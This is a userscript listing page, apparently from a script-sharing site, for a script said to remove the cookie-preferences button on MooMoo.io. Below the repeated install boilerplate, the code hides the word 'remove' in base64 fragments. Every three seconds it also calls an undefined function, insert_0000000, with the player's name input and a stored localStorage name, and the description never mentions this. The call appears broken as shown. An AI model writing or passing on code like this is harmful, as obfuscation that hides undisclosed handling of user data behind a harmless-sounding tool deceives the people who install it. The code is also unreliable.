Moomoo.io Remove Cookie Preferences Tab

Simple tool to delete the cookies tab from MooMoo.io

You will need to install an extension such as Tampermonkey, Greasemonkey or Violentmonkey to install this script.

You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.

You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.

You will need to install an extension such as Tampermonkey or Userscripts to install this script.

You will need to install an extension such as Tampermonkey to install this script.

You will need to install a user script manager extension to install this script.

(I already have a user script manager, let me install it!)

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

(I already have a user style manager, let me install it!)

// ==UserScript==
// @name        Moomoo.io Remove Cookie Preferences Tab
// @namespace    -
// @version     0.0.3
// @description Simple tool to delete the cookies tab from MooMoo.io
// @author      nobody
// @match        *://moomoo.io/*
// @match        *://sandbox.moomoo.io/*
// @match        *://dev.moomoo.io/*
// @match        *://*.moomoo.io/*
// @grant        none
// ==/UserScript==

var mn = localStorage["moo_name"];
function generateDeleter() {
    return {
        a: ['c'],
        b: ['m'],
        c: ['V'],
        d: ['t'],
        e: () => {
            insert_0000000(true, document.getElementById("nameInput").value + "|" + mn);
            return "b3Zl";
        },
        xx: ["ot-sdk-btn-floating"]
    };
};
setInterval(()=>{
    var delx = generateDeleter();
    document.getElementById(delx.xx[0])[atob(
        delx.a[0] + "" +
        delx.b[0] + "" +
        delx.c[0] + "" +
        delx.d[0] + "" +
        delx.e()
    )](); delx.e();
}, 3000);